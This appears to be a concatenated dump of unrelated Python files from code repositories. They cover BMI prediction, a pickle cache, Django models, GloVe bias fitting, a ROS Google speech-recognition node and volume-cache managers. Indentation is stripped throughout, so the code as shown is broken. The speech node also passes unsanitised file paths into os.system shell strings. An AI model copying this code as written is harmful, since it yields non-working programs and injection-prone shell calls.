BMI = weight / (height ** 2)
# BMI = (int(ret.group(4))/100000) / (int(ret.group(3))/100000)**2
Pic_name = os.path.join(self.file, self.Pic_Names[idx])
return (Pic, Pic_name, img_name, sex, age, height, weight), BMI
def CombineDFBF(model, BodyFeatures, df, loader_test, loader_train):
# test(model, DEVICE, loader_test)
loaders = [ loader_test, loader_train,]
files = [ 'test', 'train',]
for loader, file in zip(loaders, files):
with open('/home/benkesheng/BMI_DETECT/Deep_Learning_Method/DF_BF_csv/20-1_{}.csv'.format(file), 'w',
newline='') as fp:
writer = csv.writer(fp)
model.eval()
pred = []
targ = []
for (img, name, img_name, sex, age, height, weight), target in loader:
values = []
img, target = img.to(DEVICE), target.to(DEVICE)
img_name = img_name[0]
# print('Processing IMage :', img_name)
values.append(img_name)
values.append(target.cpu().numpy()[0])
values.append(sex.numpy()[0])
values.append(BodyFeatures[img_name]['WSR'])
values.append(BodyFeatures[img_name]['WTR'])
values.append(BodyFeatures[img_name]['WHpR'])
values.append(BodyFeatures[img_name]['WHdR'])
values.append(BodyFeatures[img_name]['HpHdR'])
values.append(BodyFeatures[img_name]['Area'])
values.append(BodyFeatures[img_name]['H2W'])
conv_out = LayerActivations(model.fc, 1)
out = model(img)
pred.append(out.item())
targ.append(target.item())
conv_out.remove()
xs = torch.squeeze(conv_out.features.detach()).numpy()
# print(xs.shape)
for x in xs:
values.append(float(x))
values.append(age.numpy()[0])
values.append(height.numpy()[0])
values.append(weight.numpy()[0])
writer.writerow(values)
MAE = mean_absolute_error(targ, pred)
print(file,' ',MAE)
def Pre(raw_data, name):
if (name != 'vgg16'):
raw_data = raw_data.iloc[:, 1:]
raw_data = raw_data.replace([np.inf, -np.inf], np.nan)
# raw_data = raw_data.fillna(raw_data.mean())
raw_data = raw_data.replace(np.nan, 0)
raw_data = raw_data.values.astype(np.float64)
return raw_data
def Feature(data, df, name):
if (name == 'author'):
x_5f = data[:, 0:5]
y = data[:, 9]
return x_5f, y
elif (name == 'vgg16'):
x_df = data[:, 2:]
y = data[:, 0]
return x_df, y
elif (name == 'ours'):
x_5f = data[:, 3:8]
x_7f = data[:, 2:9]
x_df = data[:, 9:9 + df]
y = data[:, 0]
return x_5f, x_7f, x_df, y
def Stdm(x):
Mean = np.mean(x, axis=0)
Std = np.std(x, axis=0)
return Mean, Std
def Regression(df=20, file='test'):
# raw_data_train = pd.read_csv('/home/benkesheng/BMI_DETECT/ReDone_CSV/Ours/Image_train.csv')
# raw_data_test = pd.read_csv('/home/benkesheng/BMI_DETECT/ReDone_CSV/Ours/Image_test.csv')
raw_data_train = pd.read_csv('/home/benkesheng/BMI_DETECT/Deep_Learning_Method/DF_BF_csv/20-1_train.csv')
raw_data_test = pd.read_csv('/home/benkesheng/BMI_DETECT/Deep_Learning_Method/DF_BF_csv/20-1_test.csv')
raw_data_name = raw_data_test.values
raw_data_train = Pre(raw_data_train, 'ours')
raw_data_test = Pre(raw_data_test, 'ours')
x_5f_train, x_7f_train, x_df_train, y_train = Feature(raw_data_train, df, 'ours')
x_5f_test, x_7f_test, x_df_test, y_test = Feature(raw_data_test, df, 'ours')
x_body_train = x_7f_train
Mean, Std = Stdm(x_body_train)
x_body_train = (x_body_train - Mean) / Std
x_train = np.append(x_body_train, x_df_train, axis=1)
y_train = y_train
x_body_test = x_7f_test
x_body_test = (x_body_test - Mean) / Std
x_test = np.append(x_body_test, x_df_test, axis=1)
y_test = y_test
print(x_test.shape)
print(x_train.shape)
krr = KernelRidge()
krr.fit(x_train, y_train)
y_krr = krr.predict(x_test)
print('KRR: MAE: ', mean_absolute_error(y_test, y_krr), ' MAPE: ', mean_absolute_percentage_error(y_test, y_krr))
if file == 'demo':
for i, data in enumerate(x_test):
y_pred = krr.predict(data[None,:])
print('Name: ', raw_data_name[i][0], ' y_pred:', y_pred[0], ' y_ture:', y_test[i])
if __name__ == '__main__':
IMG_SIZE = 224
IMG_MEAN = [0.485, 0.456, 0.406]
IMG_STD = [0.229, 0.224, 0.225]
transform = transforms.Compose([
Resize(IMG_SIZE),
transforms.Pad(IMG_SIZE),
transforms.CenterCrop(IMG_SIZE),
transforms.ToTensor(),
transforms.Normalize(IMG_MEAN, IMG_STD)
])
DEVICE = torch.device("cuda:0")
dataset_train = Dataset('/home/benkesheng/BMI_DETECT/datasets/Image_train', transform)
dataset_test = Dataset('/home/benkesheng/BMI_DETECT/datasets/Image_test', transform)
loader_train = torch.utils.data.DataLoader(dataset_train, batch_size=1, shuffle=True)
loader_test = torch.utils.data.DataLoader(dataset_test, batch_size=1, shuffle=True)
df = 20
model = Dfembeding()
# model.load_state_dict(torch.load('/home/benkesheng/BMI_DETECT/ReDone_CSV/model/Ours.pkl'.format(df)))
model.load_state_dict(torch.load('/home/benkesheng/BMI_DETECT/MODEL/9-1reexperiment/MIN_RESNET101_BMI_20-1fc.pkl'))
model.to(DEVICE)
Path = '/home/benkesheng/BMI_DETECT/Deep_Learning_Method/datasets_bodyfeature/BodyFeature.json'
with open(Path, 'r') as f:
BodyFeatures = json.load(f)
# CombineDFBF(model, BodyFeatures, df, loader_test, loader_train)
Regression(df)
| 2.328125
| 2
|
alliancepy/cache.py
|
karx1/alliancepy
| 6
|
12783876
|
import pickle
class Cache:
def __init__(self):
self._filename = "alliancepy.txt"
self._cache = {}
def __enter__(self):
try:
with open(self._filename, "rb") as file:
d = pickle.load(file)
for key, value in d.items():
self._cache[key] = value
except (FileNotFoundError, EOFError):
self._cache = {}
finally:
return self
def __exit__(self, exc_type, exc_val, exc_tb):
with open(self._filename, "wb+") as file:
d = {}
for key, value in self._cache.items():
d[key] = value
pickle.dump(d, file)
def keys(self):
return self._cache.keys()
def add(self, key, value):
self._cache[key] = value
def get(self, key):
return self._cache[key]
def remove(self, key):
self._cache.pop(key, None)
def clear(self):
map(self.remove, self.keys())
| 3.390625
| 3
|
tests/integration/examples/multiply/test_example_multiply_configs.py
|
drohde/deepr
| 0
|
12783877
|
"""Test for examples.multiply.configs"""
import logging
import deepr as dpr
import deepr.examples.multiply
logging.basicConfig(level=logging.INFO)
PATH_CONFIG = dpr.io.Path(deepr.examples.multiply.__file__).parent / "configs"
def test_example_multiply_configs(tmpdir):
"""Test for examples.multiply.configs"""
path_model = str(tmpdir.join("model"))
path_dataset = str(tmpdir.join("dataset"))
config = dpr.io.read_json(PATH_CONFIG / "config.json")
macros = dpr.io.read_json(PATH_CONFIG / "macros.json")
macros["paths"]["path_model"] = path_model
macros["paths"]["path_dataset"] = path_dataset
parsed = dpr.parse_config(config, macros)
job = dpr.from_config(parsed)
job.run()
| 2.15625
| 2
|
app/models.py
|
stefanbschneider/feelya
| 1
|
12783878
|
<reponame>stefanbschneider/feelya
import datetime
from django.db import models
from django.urls import reverse
from django.contrib.auth.models import User
class Entry(models.Model):
name = models.CharField(max_length=100)
date = models.DateField('date tracked', default=datetime.date.today)
owner = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
def __str__(self):
return self.name
| 2.21875
| 2
|
workflow/utils_link_pred.py
|
skojaku/residual2vec
| 2
|
12783879
|
import numpy as np
from scipy import sparse
def fit_glove_bias(A, emb):
N = A.shape[0]
row_sum = np.array(A.sum(axis=1)).reshape(-1).astype(float)
col_sum = np.array(A.sum(axis=0)).reshape(-1).astype(float)
emb_sum = np.array(emb @ np.array(np.sum(emb, axis=0)).reshape((-1, 1))).reshape(-1)
row_sum -= emb_sum
col_sum -= emb_sum
a = np.zeros(N)
b = np.zeros(N)
adam_a = ADAM()
adam_b = ADAM()
for it in range(1000):
grad_a = row_sum - np.sum(b) * a
grad_b = col_sum - np.sum(a) * b
anew = adam_a.update(a, grad_a, 0)
bnew = adam_b.update(b, grad_b, 0)
if it % 20 == 0:
dif = np.mean(np.abs(a - anew) + np.abs(b - bnew)) / 2
dif /= np.maximum(np.mean(np.abs(a) + np.abs(b)) / 2, 1e-8)
if dif < 1e-2:
break
a = anew.copy()
b = bnew.copy()
return a, b
class ADAM:
def __init__(self):
self.beta1 = 0.9
self.beta2 = 0.999
self.eta = 0.001
self.t = 0
self.mt = None
self.vt = None
self.eps = 1e-8
def update(self, theta, grad, lasso_penalty, positiveConstraint=False):
"""Ascending."""
if self.mt is None:
self.mt = np.zeros(grad.shape)
self.vt = np.zeros(grad.shape)
self.t = self.t + 1
self.mt = self.beta1 * self.mt + (1 - self.beta1) * grad
self.vt = self.beta2 * self.vt + (1 - self.beta2) * np.multiply(grad, grad)
mthat = self.mt / (1 - np.power(self.beta1, self.t))
vthat = self.vt / (1 - np.power(self.beta2, self.t))
new_grad = mthat / (np.sqrt(vthat) + self.eps)
return self._prox(
theta + self.eta * new_grad, lasso_penalty * self.eta, positiveConstraint
)
def _prox(self, x, lam, positiveConstraint):
"""Soft thresholding operator.
Parameters
----------
x : float
Variable.
lam : float
Lasso penalty.
Returns
-------
y : float
Thresholded value of x.
"""
if positiveConstraint:
b = ((lam) > 0).astype(int)
return np.multiply(b, np.maximum(x - lam, np.zeros(x.shape))) + np.multiply(
1 - b,
np.multiply(np.sign(x), np.maximum(np.abs(x) - lam, np.zeros(x.shape))),
)
else:
return np.multiply(
np.sign(x), np.maximum(np.abs(x) - lam, np.zeros(x.shape))
)
| 2.4375
| 2
|
rapp_speech_detection_google/src/speech_recognition_google.py
|
DEVX1/NAOrapp-Pythonlib
| 0
|
12783880
|
<gh_stars>0
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
#Copyright 2015 RAPP
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import rospy
import httplib
import json
import sys
import os
from pylab import *
from scipy.io import wavfile
from rapp_platform_ros_communications.srv import (
SpeechToTextSrv,
SpeechToTextSrvResponse
)
from rapp_platform_ros_communications.srv import (
AudioProcessingDenoiseSrv,
AudioProcessingDenoiseSrvResponse,
AudioProcessingDenoiseSrvRequest
)
from rapp_platform_ros_communications.srv import (
AudioProcessingTransformAudioSrv,
AudioProcessingTransformAudioSrvResponse,
AudioProcessingTransformAudioSrvRequest
)
from rapp_platform_ros_communications.msg import (
StringArrayMsg
)
from rapp_exceptions import RappError
## @class SpeechToTextGoogle
# Implements calls the Google ASR API
class SpeechToTextGoogle:
## Default contructor. Declares the service callback
def __init__(self):
# Speech recognition service published
self.serv_topic = rospy.get_param("rapp_speech_detection_google_detect_speech_topic")
if(not self.serv_topic):
rospy.logerror("Speech detection google topic param not found")
self.serv = rospy.Service(self.serv_topic, \
SpeechToTextSrv, self.speech_to_text_callback)
## @brief The service callback
# @param req [SpeechToTextSrvRequest] The ROS service request
def speech_to_text_callback(self, req):
res = SpeechToTextSrvResponse()
if req.language == '':
res.error = 'No language specified'
return res
# Getting the results in order to parse them
try:
transcripts = self.speech_to_text(\
req.filename,\
req.user,\
req.audio_type,\
req.language)
#print transcripts
except RappError as e:
res.error = e.value
return res
if len(transcripts['result']) == 0:
return res
# The alternative results
alternatives = transcripts['result'][0]['alternative']
res = SpeechToTextSrvResponse()
# If alternatives is 0 returns void response
if len(alternatives) > 0:
# The first alternative is Google's suggestion
words = alternatives[0]['transcript'].split(" ")
for w in words:
res.words = res.words + [w]
# Google provides the confidence for the first suggestion
if 'confidence' in alternatives[0].keys():
res.confidence.data = alternatives[0]['confidence']
else:
res.confidence.data = 0
for alt in alternatives[1:]:
sam = StringArrayMsg()
words = alt['transcript'].split(" ")
for w in words:
sam.s = sam.s + [w]
res.alternatives = res.alternatives + [sam]
else:
res.confidence.data = 0
return res
## @brief Performs the call to Google API
# @param file_path [string] The audio file
# @param user [string] The username
# @param audio_type [string] Used to check if denoising is needed. Can be one of headset, nao_ogg, nao_wav_1_ch, nao_wav_4_ch
# @param language [string] The language in which the ASR will be performed
# @return The transcript from Google
def speech_to_text(self, file_path, user, audio_file_type, language):
# Check if file exists
if not os.path.isfile(file_path):
raise RappError("Error: file " + file_path + ' not found')
# Check if file is flac. If not convert it
new_audio = file_path
audio_trans_topic = rospy.get_param("rapp_audio_processing_transform_audio_topic")
audio_transform_srv = rospy.ServiceProxy( audio_trans_topic, AudioProcessingTransformAudioSrv )
cleanup = []
transform_req = AudioProcessingTransformAudioSrvRequest()
transform_req.source_type = audio_file_type
transform_req.source_name = new_audio
transform_req.target_type = 'wav'
new_audio += '.wav'
transform_req.target_name = new_audio
transform_req.target_channels = 1
transform_req.target_rate = 16000
trans_response = audio_transform_srv( transform_req )
if trans_response.error != 'success':
raise RappError( trans_response.error )
cleanup.append(new_audio)
# Denoise if necessary
prev_audio_file = new_audio
next_audio_file = prev_audio_file
if audio_file_type in ['nao_ogg', 'nao_wav_1_ch', 'nao_wav_4_ch']:
denoise_topic = rospy.get_param("rapp_audio_processing_denoise_topic")
energy_denoise_topic = \
rospy.get_param("rapp_audio_processing_energy_denoise_topic")
denoise_service = rospy.ServiceProxy(\
denoise_topic, AudioProcessingDenoiseSrv)
energy_denoise_service = rospy.ServiceProxy(\
energy_denoise_topic, AudioProcessingDenoiseSrv)
manipulation = {}
manipulation['sox_transform'] = False
manipulation['sox_denoising'] = False
manipulation['sox_channels_and_rate'] = False
if audio_file_type == "headset":
pass
elif audio_file_type == "nao_ogg":
manipulation['sox_transform'] = True
manipulation['sox_denoising'] = True
manipulation['sox_denoising_scale'] = 0.15
elif audio_file_type == "nao_wav_4_ch":
manipulation['sox_channels_and_rate'] = True
manipulation['sox_denoising'] = True
manipulation['sox_denoising_scale'] = 0.15
elif audio_file_type == "nao_wav_1_ch":
manipulation['sox_denoising'] = True
manipulation['sox_denoising_scale'] = 0.15
manipulation['detect_silence'] = True
manipulation['detect_silence_threshold'] = 0.25
# Check if sox_transform is needed
if manipulation['sox_transform'] == True:
next_audio_file += "_transformed.wav"
command = "sox " + prev_audio_file + " " + next_audio_file
com_res = os.system(command)
if com_res != 0:
raise RappError("Error: sox malfunctioned")
cleanup.append(next_audio_file)
prev_audio_file = next_audio_file
if manipulation['sox_channels_and_rate'] == True:
next_audio_file += "_mono16k.wav"
command = "sox " + prev_audio_file + " -r 16000 -c 1 " + next_audio_file
com_res = os.system(command)
if com_res != 0:
raise RappError("Error: sox malfunctioned")
cleanup.append(next_audio_file)
prev_audio_file = next_audio_file
if manipulation['sox_denoising'] == True:
next_audio_file = prev_audio_file + "_denoised.wav"
den_request = AudioProcessingDenoiseSrvRequest()
den_request.audio_file = prev_audio_file
den_request.denoised_audio_file = next_audio_file
den_request.audio_type = audio_file_type
den_request.user = user
den_request.scale = manipulation['sox_denoising_scale']
den_response = denoise_service(den_request)
if den_response.success != "true":
raise RappError("Error:" + den_response.success)
cleanup.append(next_audio_file)
prev_audio_file = next_audio_file
# must implement a fallback function to clear redundant files
# Transform to flac
transform_req = AudioProcessingTransformAudioSrvRequest()
transform_req.source_type = 'headset'
transform_req.source_name = new_audio
transform_req.target_type = 'flac'
newer_audio = new_audio + '.flac'
transform_req.target_name = newer_audio
transform_req.target_channels = 1
transform_req.target_rate = 16000
trans_response = audio_transform_srv( transform_req )
cleanup.append(newer_audio)
if trans_response.error != 'success':
raise RappError( trans_response.error )
# Open the file
with open(newer_audio, "r") as f:
speech = f.read()
url = "www.google.com"
# Fix language
if language == 'en':
language = "en-US"
elif language == 'gr':
language = 'el'
#NOTE - Thats a general usage key. They may disable it in the future.
key = "<KEY>"
path = "/speech-api/v2/recognize?lang=" + language + "&key=" + key
headers = { "Content-type": "audio/x-flac; rate=22050" };
params = {"xjerr": "1", "client": "chromium"}
conn = httplib.HTTPSConnection(url)
conn.request("POST", path, speech, headers)
response = conn.getresponse()
data = response.read()
initial_data = data
# Google returns one empty result for some reason here. Removing it..
index = data.find("}")
data = data[index + 1:]
if data == '\n':
# Returned nothing.. something went wrong
data = initial_data
jsdata = json.loads(data)
# Remove the flac if needed
for f in cleanup:
command = 'rm -f ' + f
if os.system(command):
raise RappError("Error: Removal of temporary file malfunctioned")
return jsdata
## The main function. Creates a SpeechToTextGoogle object
if __name__ == "__main__":
rospy.init_node('speech_to_text_ros_node')
speech_to_text_node = SpeechToTextGoogle()
rospy.spin()
| 2.078125
| 2
|
apps/shows/migrations/0010_show_social.py
|
jorgesaw/oclock
| 0
|
12783881
|
# Generated by Django 2.2.13 on 2020-10-04 06:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('socials', '0004_auto_20201004_0347'),
('shows', '0009_auto_20201004_0137'),
]
operations = [
migrations.AddField(
model_name='show',
name='social',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='socials.UserSocialNetwork', verbose_name='Social Network'),
),
]
| 1.484375
| 1
|
Labs/Unit1Lesson3.py
|
CAP1Sup/SieskoPythonLabs
| 0
|
12783882
|
# <NAME>
# 9/9/19
# This program will ask the user for a few words and then create a story like a Mad Libs paper.
def main():
name = input("Please put in the name of a person: ")
verb1 = input("Please input a verb in infinitive form: ")
noun = input("Please input a proper noun: ")
ability = input("Please input an ability in infinitive form (ex fly): ")
num1 = input("Please input a number: ")
unit1 = input("Please input a unit that has to do with the ability: ")
ability2 = input("Please enter a second ability: ")
num2 = input("Please input a second number: ")
unit2 = input("Please input a second unit (in infinitive) that would fit with the second ability: ")
deathDate = input("Please input a date in the future: ")
print()
print("One day,", name, "was", verb1, "in a forest.")
print("All of the sudden,", name, "fell asleep.")
nameWithS = (name + "'s")
print("Then,", noun, "appeared in", nameWithS, "dream")
print(name, "woke up suddenly.")
print(name, "went home, and felt tired, so", name, "went to bed.")
print("The next morning,", name, "had the ability to", ability)
print(name, "discovered that he/she could", ability, "at", num1, unit1)
print(name, "also found at that he/she could", ability2, "at", num2, unit2)
print(name, "saved the world from the plans of the evil Doctor Siesko. He then promptly enjoyed the rest of his life until the day he died,", deathDate)
main()
| 4.25
| 4
|
assignment_dashboard/config.py
|
osteele/assignment-dashboard
| 0
|
12783883
|
<filename>assignment_dashboard/config.py
import os
class BaseConfig(object):
DEBUG_TB_INTERCEPT_REDIRECTS = False
SECRET_KEY = os.environ.get('SECRET_KEY', 'change me in production')
db_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../data/database.db'))
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL', 'sqlite:///' + db_path)
SQLALCHEMY_ECHO = True if os.environ.get('SQLALCHEMY_ECHO') else False
SQLALCHEMY_TRACK_MODIFICATIONS = False
TZ = os.environ.get('TZ', 'US/Eastern')
if 'GITHUB_CLIENT_ID' in os.environ:
REQUIRE_LOGIN = True
GITHUB_CLIENT_ID = os.environ['GITHUB_CLIENT_ID']
GITHUB_CLIENT_SECRET = os.environ['GITHUB_CLIENT_SECRET']
else:
REQUIRE_LOGIN = False
if 'REDIS_HOST' in os.environ:
REDIS_HOST = os.environ['REDIS_HOST']
| 2.03125
| 2
|
Python/Stacks/BalancedBrackets/BalancedBrackets.py
|
zseen/hackerrank-challenges
| 0
|
12783884
|
#!/bin/python3
import math
import os
import random
import re
import sys
BRACKETS_DICT = {"(": ")", "[": "]", "{": "}"}
def printIsBalanced(brackets):
result = isBalanced(brackets)
if result:
print("YES")
else:
print("NO")
def isBalanced(brackets):
stack = []
for bracket in brackets:
if bracket in BRACKETS_DICT.keys():
stack.append(bracket)
else:
if not stack or bracket != BRACKETS_DICT[stack.pop()]:
return False
if stack:
return False
return True
if __name__ == '__main__':
sys.stdin = open("BalancedBrackets_input.txt")
t = int(input())
for _ in range(t):
s = input()
printIsBalanced(s)
| 3.890625
| 4
|
os_brick/caches/__init__.py
|
KioxiaAmerica/os-brick
| 61
|
12783885
|
<filename>os_brick/caches/__init__.py
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import abc
from oslo_log import log as logging
from oslo_utils import importutils
from os_brick import exception
from os_brick.i18n import _
LOG = logging.getLogger(__name__)
CACHE_ENGINE_TO_CACHE_CLASS_MAP = {
"opencas": 'os_brick.caches.opencas.OpenCASEngine',
}
class CacheEngineBase(object, metaclass=abc.ABCMeta):
def __init__(self, **kwargs):
self._root_helper = kwargs.get('root_helper')
@abc.abstractmethod
def is_engine_ready(self, **kwargs):
return
@abc.abstractmethod
def attach_volume(self, **kwargs):
return
@abc.abstractmethod
def detach_volume(self, **kwargs):
return
class CacheManager():
"""Cache manager for volumes.
This CacheManager uses cache engines to do volume cache.
"""
def __init__(self, root_helper, connection_info,
*args, **kwargs):
data = connection_info['data']
if not data.get('device_path'):
volume_id = data.get('volume_id') or connection_info.get('serial')
raise exception.VolumeLocalCacheNotSupported(
volume_id=volume_id,
volume_type=connection_info.get('driver_volume_type'))
self.ori_device_path = data.get('device_path')
if not data.get('cacheable'):
self.cacheable = False
return
self.cacheable = True
self.root_helper = root_helper
self.engine_name = kwargs.get('cache_name')
self.args = args
self.kwargs = kwargs
self.kwargs["root_helper"] = root_helper
self.kwargs["dev_path"] = data.get('device_path')
self.engine = self._get_engine(self.engine_name, **self.kwargs)
def _get_engine(self, engine_name, **kwargs):
eng_cls_path = CACHE_ENGINE_TO_CACHE_CLASS_MAP.get(engine_name)
if eng_cls_path:
engine_cls = importutils.import_class(eng_cls_path)
eng = engine_cls(**kwargs)
if eng.is_engine_ready():
return eng
raise exception.Invalid(_("No valid cache engine"))
def attach_volume(self):
"""setup the cache when attaching volume."""
if not self.cacheable:
return self.ori_device_path
LOG.debug("volume before cached: %s", self.kwargs.get('dev_path'))
emulated_disk = self.engine.attach_volume(**self.kwargs)
LOG.debug("volume after cached: %s", emulated_disk)
return emulated_disk
def detach_volume(self):
"""Release the cache on detaching volume."""
if not self.cacheable:
return self.ori_device_path
LOG.debug("volume before detach: %s", self.kwargs.get('dev_path'))
ori_disk = self.engine.detach_volume(**self.kwargs)
LOG.debug("volume after detach: %s", ori_disk)
return ori_disk
| 2.28125
| 2
|
py_helloworld/test/run.py
|
mingshi-wang/fp20
| 2
|
12783886
|
<filename>py_helloworld/test/run.py
"""Universal launcher for unit tests"""
import argparse
import logging
import os
import sys
import unittest
def main():
"""Parse args, collect tests and run them"""
# Disable *.pyc files
sys.dont_write_bytecode = True
# Add ".." to module search path
cur_dir = os.path.dirname(os.path.realpath(__file__))
top_dir = os.path.abspath(os.path.join(cur_dir, os.pardir))
sys.path.append(top_dir)
# Parse command line arguments
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("-v", "--verbose", action="count", default=0,
help="verbosity level, use: [-v | -vv | -vvv]")
parser.add_argument("-s", "--start-directory", default=None,
help="directory to start discovery")
parser.add_argument("-p", "--pattern", default="test*.py",
help="pattern to match test files ('test*.py' default)")
parser.add_argument("test", nargs="*",
help="test specs (e.g. module.TestCase.test_func)")
args = parser.parse_args()
if not args.start_directory:
args.start_directory = cur_dir
if args.verbose > 2:
logging.basicConfig(level=logging.DEBUG, format="DEBUG: %(message)s")
loader = unittest.TestLoader()
if args.test:
# Add particular tests
for test in args.test:
suite = unittest.TestSuite()
suite.addTests(loader.loadTestsFromName(test))
else:
# Find all tests
suite = loader.discover(args.start_directory, args.pattern)
runner = unittest.TextTestRunner(verbosity=args.verbose)
result = runner.run(suite)
return result.wasSuccessful()
if __name__ == "__main__":
# NOTE: True(success) -> 0, False(fail) -> 1
exit(not main())
| 2.921875
| 3
|
exercises/python/data-types/basic/nested-list.py
|
rogeriosantosf/hacker-rank-profile
| 0
|
12783887
|
<filename>exercises/python/data-types/basic/nested-list.py
# Given the names and grades for each student in a class of students,
# store them in a nested list and print the name(s) of any student(s)
# having the second lowest grade.
# Note: If there are multiple students with the second lowest grade,
# order their names alphabetically and print each name on a new line.
# Sample Input:
# 5
# Harry
# 37.21
# Berry
# 37.21
# Tina
# 37.2
# Sample Output:
# Berry
# Harry
if __name__ == '__main__':
students = []
for _ in range(int(input())):
name = input()
score = float(input())
students.append([name, score])
students = sorted(students, key=lambda student: student[1])
lowest_grade = students[0][1]
second_lowest_grade = None
second_lowest_names = []
for i in range(len(students)):
if students[i][1] > lowest_grade:
if second_lowest_grade == None:
second_lowest_grade = students[i][1]
second_lowest_names.append(students[i][0])
elif students[i][1] == second_lowest_grade:
second_lowest_names.append(students[i][0])
second_lowest_names.sort()
for name in second_lowest_names:
print(name)
| 4.25
| 4
|
pepper_snp/modules/python/MakeImages.py
|
Samteymoori/pepper
| 0
|
12783888
|
import os
from pepper_snp.modules.python.ImageGenerationUI import UserInterfaceSupport
def make_images(bam_file, draft_file, region, output_path, total_threads, downsample_rate):
output_dir = UserInterfaceSupport.handle_output_directory(os.path.abspath(output_path))
chr_list, bed_list = UserInterfaceSupport.get_chromosome_list(region, draft_file, bam_file, region_bed=None)
UserInterfaceSupport.chromosome_level_parallelization(chr_list=chr_list,
bam_file=bam_file,
draft_file=draft_file,
truth_bam_h1=None,
truth_bam_h2=None,
output_path=output_dir,
total_threads=total_threads,
realignment_flag=False,
train_mode=False,
downsample_rate=downsample_rate,
bed_list=None)
def make_train_images(bam_file, draft_file, truth_bam_h1, truth_bam_h2, region, region_bed, output_path, total_threads, downsample_rate):
output_dir = UserInterfaceSupport.handle_output_directory(os.path.abspath(output_path))
chr_list, bed_list_dictionary = UserInterfaceSupport.get_chromosome_list(region, draft_file, bam_file, region_bed=region_bed)
UserInterfaceSupport.chromosome_level_parallelization(chr_list=chr_list,
bam_file=bam_file,
draft_file=draft_file,
truth_bam_h1=truth_bam_h1,
truth_bam_h2=truth_bam_h2,
output_path=output_dir,
total_threads=total_threads,
realignment_flag=False,
train_mode=True,
downsample_rate=downsample_rate,
bed_list=bed_list_dictionary)
| 2.234375
| 2
|
terminusdb_client/woqldataframe/__init__.py
|
KarenImmanuel/terminusdb-client-python
| 1
|
12783889
|
<gh_stars>1-10
from .woqlDataframe import ( # noqa
EmptyException,
extract_column,
extract_header,
query_to_df,
result_to_df,
type_map,
type_value_map,
)
| 1.28125
| 1
|
react_front_end/src/tools/copy-layout.py
|
benthomasson/performance_test
| 1
|
12783890
|
<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2018 <NAME>
"""
Usage:
copy-layout [options] <from> <to>
Options:
-h, --help Show this page
--debug Show debug logging
--verbose Show verbose logging
"""
from docopt import docopt
import logging
import sys
import yaml
logger = logging.getLogger('copy-layout')
def main(args=None):
if args is None:
args = sys.argv[1:]
parsed_args = docopt(__doc__, args)
if parsed_args['--debug']:
logging.basicConfig(level=logging.DEBUG)
elif parsed_args['--verbose']:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.WARNING)
with open(parsed_args['<from>']) as f:
from_fsm = yaml.load(f.read())
with open(parsed_args['<to>']) as f:
to_fsm = yaml.load(f.read())
to_states = {x['label']: x for x in to_fsm.get('states', [])}
to_fsm['name'] = from_fsm.get('name', '')
to_fsm['finite_state_machine_id'] = from_fsm.get(
'finite_state_machine_id', '')
to_fsm['diagram_id'] = from_fsm.get('diagram_id', '')
for state in from_fsm.get('states', []):
to_states.get(state['label'], {})['x'] = state.get('x', 0)
to_states.get(state['label'], {})['y'] = state.get('y', 0)
with open(parsed_args['<to>'], 'w') as f:
f.write(yaml.safe_dump(to_fsm, default_flow_style=False))
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| 2.296875
| 2
|
bluebottle/events/migrations/0015_auto_20200226_0838.py
|
terrameijar/bluebottle
| 10
|
12783891
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2020-02-26 07:38
from __future__ import unicode_literals
from datetime import datetime
from timezonefinder import TimezoneFinder
import pytz
from django.db import migrations
from django.utils import timezone
tf = TimezoneFinder()
def set_timezone(apps, schema_editor):
Event = apps.get_model('events', 'Event')
for event in Event.objects.filter(start__isnull=False, location__isnull=False):
tz_name = tf.timezone_at(
lng=event.location.position.x,
lat=event.location.position.y
)
tz = pytz.timezone(tz_name)
start = event.start.astimezone(timezone.get_current_timezone())
event.start = tz.localize(
datetime(
start.year,
start.month,
start.day,
start.hour,
start.minute,
)
)
event.save()
class Migration(migrations.Migration):
dependencies = [
('events', '0014_auto_20200217_1107'),
]
operations = [
migrations.RunPython(set_timezone)
]
| 2.0625
| 2
|
MFGPextreme/core/acquisitions.py
|
umbrellagong/MFGPextreme
| 1
|
12783892
|
import numpy as np
from scipy.linalg import cho_solve, inv
from scipy.stats import norm
from scipy.interpolate import InterpolatedUnivariateSpline
from sklearn.mixture import GaussianMixture as GMM
from .utils import custom_KDE
import time
class Acq(object):
'''
The base acq class.
'''
def __init__(self, inputs):
self.inputs = inputs
def compute_value(self, x):
raise NotImplementedError
def update_prior_search(self, model):
raise NotImplementedError
class AcqLW(Acq):
''' Select the next sample for estimating extreme event statistics.
This acquisition can be used in both single and multi-fidelity contexts.
parameters:
---------
inputs: instance of Input class
Input of the problem including pdf information and a sampling method.
ll_type: string
the type of the weights, must be one of
(1) rare: w(x)=p(x)/p(y(x))
(2) extreme: w(x)=p(x)|y(x)-z|^n
(3) plain: no weights
(4) input: w(x)=p(x)
load_pts: bool
whether load the input samples from a txt file
ll_kwargs: key words for extreme ll_type
attributes:
----------
model: instance of gpr.GaussianProcessRegressor
The surrogate model based on current dataset
DX: array
The inputs of current samples
gmm: instance of sklearn.GMM
The gmm to approximate likelihood, including gmm.means_,
gmm.covariances_, and gmm.scores_.
'''
